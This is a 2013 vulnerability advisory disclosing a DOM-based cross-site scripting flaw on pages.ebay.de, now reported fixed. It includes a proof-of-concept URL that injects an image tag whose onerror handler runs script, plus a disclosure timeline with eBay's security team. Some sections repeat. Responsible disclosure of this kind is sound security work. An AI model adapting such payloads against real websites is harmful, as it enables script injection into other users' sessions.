SSCHADV2013-011 - pages.ebay.de - DOM based Cross-site Scripting vulnerability
|
Advisory:
|
pages.ebay.de – DOM based Cross-site Scripting vulnerability
|
|
Advisory ID:
|
SSCHADV2013-011
|
|
Author:
|
Stefan Schurtz
|
|
Affected Software:
|
Successfully tested on pages.ebay.de
|
|
Vendor URL:
|
|
|
Vendor Status:
|
fixed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The website ‘pages.ebay.de’ is prone to a DOM based XSS vulnerability
======================
PoC-Exploit
======================
// IE10 / SRWware Iron 24.0 / Google Chrome 27.0
PoC-Exploit
======================
// IE10 / SRWware Iron 24.0 / Google Chrome 27.0
| http://pages.ebay.de/kaeuferschutz/fragen-antworten.html?tSection=1111#"><img src="aaa.jpg" onerror=javascript:alert(document.domain)> |
======================
Disclosure Timeline
======================
19-Oct-2013 – vendor informed by contact form (http://pages.ebay.com/securitycenter/researchers.html)
21-Oct-2013 – feedback from eBay Security Research team
22-Oct-2013 – sending more infos about the XSS to the eBay Security Research Team
25-Oct-2013 – vendor asks for more technical information
26-Oct-2013 – technical details sent to eBay Security Research team
07-Nov-2013 – vulnerability seems to be fixed
11-Nov-2013 – eBay Security Research team confirms the fix
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ebay.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-011.txt
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.ebay.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-011.txt
Trackbacks
No Trackbacks
Comments
Display comments as Linear | Threaded